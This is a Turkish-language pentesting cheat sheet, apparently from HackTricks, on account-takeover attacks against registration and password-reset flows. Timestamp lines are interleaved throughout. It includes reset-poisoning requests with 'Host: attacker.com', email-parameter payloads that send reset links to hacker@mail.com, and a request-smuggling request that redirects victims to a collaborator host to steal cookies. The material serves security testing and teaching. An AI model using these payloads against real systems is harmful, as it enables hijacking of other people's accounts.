2024-02-10 18:14:16 +00:00
# Kayı t ve Ele Geçirme Zafiyetleri
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 18:14:16 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramanla öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Kı rmı zı Takı m Uzmanı )< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları :
2024-02-03 14:45:32 +00:00
2024-02-10 18:14:16 +00:00
* Şirketinizi HackTricks'te **reklamı nı zı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
* [**The PEASS Ailesi'ni** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
* 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) **katı lı n** veya **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )'u **takip edin** .
* Hacking hilelerinizi göndererek **HackTricks** ve **HackTricks Cloud** github depoları na **PR göndererek** paylaşı n.
2022-04-28 16:01:33 +00:00
< / details >
2024-02-10 18:14:16 +00:00
## Kayı t Ele Geçirme
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
### Yinelemeli Kayı t
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
* Var olan bir kullanı cı adı kullanarak oluşturmayı deneyin
* E-postayı değiştirerek kontrol edin:
* büyük harf
* \+1@
* e-postada nokta ekleyin
* e-posta adı nda özel karakterler (%00, %09, %20)
* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Kullanı cı Adı Sorgulama
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
Uygulama içinde bir kullanı cı adı nı n zaten kaydedilip kaydedilmediğini bulmaya çalı şı n.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Politikası
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
Bir kullanı cı oluştururken şifre politikası nı kontrol edin (zayı f şifreler kullanabilir misiniz).\
Bu durumda kimlik bilgilerini kaba kuvvet saldı rı sı yla deneyebilirsiniz.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### SQL Enjeksiyonu
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
Kayı t formları nda hesap ele geçirme veya bilgi çalma girişimlerinde bulunmak için **SQL Enjeksiyonları ** hakkı nda bilgi almak için [**bu sayfayı kontrol edin** ](sql-injection/#insert-statement ).
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Oauth Ele Geçirmeleri
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md ](oauth-to-account-takeover.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### SAML Zafiyetleri
2021-06-27 14:55:59 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks ](saml-attacks/ )
{% endcontent-ref %}
2021-06-27 15:43:01 +00:00
2024-02-10 18:14:16 +00:00
### E-posta Değiştirme
2021-06-27 15:43:01 +00:00
2024-02-10 18:14:16 +00:00
Kayı t olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandı ğı nı veya keyfi e-postalara değiştirilebileceğini kontrol edin.
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
### Diğer Kontroller
2021-06-27 14:55:59 +00:00
2024-02-10 18:14:16 +00:00
* **Geçici e-postaları ** kullanı p kullanamayacağı nı zı kontrol edin
* **Uzun** **şifre** (>200), **DoS** 'a neden olur
* Hesap oluşturma üzerindeki **hı z sı nı rları nı kontrol edin**
* username@**burp\_collab**.net kullanı n ve **geri çağrı yı ** analiz edin
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
## **Şifre Sı fı rlama Ele Geçirmesi**
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Sı fı rlama Jetonu Referrer Üzerinden Sı zı ntı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. E-posta adresinize şifre sı fı rlama isteği gönderin
2. Şifre sı fı rlama bağlantı sı na tı klayı n
3. Şifreyi değiştirmeyin
4. Herhangi bir 3. taraf web sitesine tı klayı n (örneğin: Facebook, twitter)
5. Burp Suite proxy'de isteği yakalayı n
6. Referer başlı ğı nı n şifre sı fı rlama jetonunu sı zdı rı p sı zdı rmadı ğı nı kontrol edin.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Sı fı rlama Zehirlenmesi <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. Şifre sı fı rlama isteğini Burp Suite'de yakalayı n
2. Burp Suite'de aşağı daki başlı kları ekleyin veya düzenleyin: `Host: attacker.com` , `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş başlı kla isteği yönlendirin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host başlı ğı na_ dayalı bir şifre sı fı rlama URL'si arayı n: `https://attacker.com/reset-password.php?token=TOKEN`
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### E-posta Parametresi Aracı lı ğı yla Şifre Sı fı rlama <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com& email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
2024-02-10 18:14:16 +00:00
### API Parametrelerinde IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. Saldı rgan, kendi hesabı yla giriş yapmalı ve **Şifre Değiştirme** özelliğine gitmelidir.
2. Burp Suite'i başlatı n ve isteği Intercept edin.
3. İsteği repeater sekmesine gönderin ve parametreleri düzenleyin: Kullanı cı Kimliği/e-posta\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Zayı f Şifre Sı fı rlama Jetonu <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
Şifre sı fı rlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalı dı r.\
Jetonun süresinin dolup dolmadı ğı nı veya her zaman aynı olup olmadı ğı nı belirlemeye çalı şı n, bazı durumlarda üretim algoritması zayı f olabilir ve tahmin edilebilir. Aşağı daki değişkenler algoritma tarafı ndan kullanı labilir.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
* Zaman damgası
* Kullanı cı Kimliği
* Kullanı cı nı n E-postası
* Ad ve Soyad
* Doğum Tarihi
* Kriptografi
* Sadece sayı
* Küçük jeton dizisi (A-Z, a-z, 0-9 arası ndaki karakterler)
* Jeton yeniden kullanı mı
* Jetonun süresi dolma tarihi
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Şifre Sı fı rlama Jetonunun Sı zdı rı lması <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. API/UI kullanarak belirli bir e-posta için şifre sı fı rlama isteği tetikleyin, örneğin: test@mail.com
2. Sunucu yanı tı nı inceleyin ve `resetToken` için kontrol edin.
3. Ardı ndan, `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` gibi bir URL'de jetonu kullanı n.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Kullanı cı Adı Çakı şması yla Şifre Sı fı rlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. Sisteme, kurbanı n kullanı cı adı yla aynı olan bir kullanı cı adı yla kaydolun, ancak kullanı cı adı nı n önüne ve/veya arkası na boşluk ekleyin. Örneğin: `"admin "`
2. Kötü niyetli kullanı cı adı yla bir şifre sı fı rlama isteği yapı n.
3. E-postanı za gönderilen jetonu kullanarak kurbanı n şifresini sı fı rlayı n.
4. Yeni şifreyle kurban hesabı na bağlanı n.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
CTFd platformu bu saldı rı ya karşı savunması zdı .\
Bkz: [CVE-2020-7245 ](https://nvd.nist.gov/vuln/detail/CVE-2020-7245 )
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### Cross Site Scripting ile Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. Uygulama içinde veya çerezlerin üst etki alanı na sahip bir alt etki alanı nda XSS bulun.
2. Mevcut **oturum çerezini** sı zdı rı n.
3. Çerez kullanarak kullanı cı olarak kimlik doğrulayı n.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### HTTP İstek Smuggling ile Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1\. HTTP İstek Smuggling türünü (CL, TE, CL.TE) tespit etmek için **smuggler** kullanı n\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h` \
2024-02-10 18:14:16 +00:00
2\. Aşağı daki verilerle `POST / HTTP/1.1` 'i üzerine yazacak bir istek oluşturun:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kurbanları burpcollab'a yönlendirerek çerezlerini çalma amacı yla\
3\. Son istek aşağı daki gibi görünebilir
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
2024-02-10 18:14:16 +00:00
Bu hata Hackerone raporları tarafı ndan sömürülmüştür:
* [https://hackerone.com/reports/737140 ](https://hackerone.com/reports/737140 )
* [https://hackerone.com/reports/771666 ](https://hackerone.com/reports/771666 )
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### CSRF ile Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
1. CSRF için bir payload oluşturun, örneğin: "Parola değişikliği için otomatik gönderimli HTML formu"
2. Payload'ı gönderin
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
### JWT ile Hesap Ele Geçirme <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
JSON Web Token, bir kullanı cı nı n kimlik doğrulaması için kullanı labilir.
2021-11-30 00:17:48 +00:00
2024-02-10 18:14:16 +00:00
* JWT'yi başka bir Kullanı cı Kimliği / E-posta ile düzenleyin
* Zayı f JWT imzası nı kontrol edin
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md ](hacking-jwt-json-web-tokens.md )
{% endcontent-ref %}
2024-02-10 18:14:16 +00:00
## Referanslar
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover ](https://salmonsec.com/cheatsheet/account\_takeover )
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 18:14:16 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahraman olacak şekilde öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'i desteklemenin diğer yolları :
2024-02-03 14:45:32 +00:00
2024-02-10 18:14:16 +00:00
* Şirketinizi HackTricks'te **reklamı nı zı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI** ](https://github.com/sponsors/carlospolop ) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini** ](https://peass.creator-spring.com ) edinin
* Özel [**NFT'lerden** ](https://opensea.io/collection/the-peass-family ) oluşan koleksiyonumuz [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )'yi keşfedin
* 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) **katı lı n** veya **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )'u **takip edin** .
* **Hacking hilelerinizi** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github reposuna **PR göndererek** paylaşı n.
2022-04-28 16:01:33 +00:00
< / details >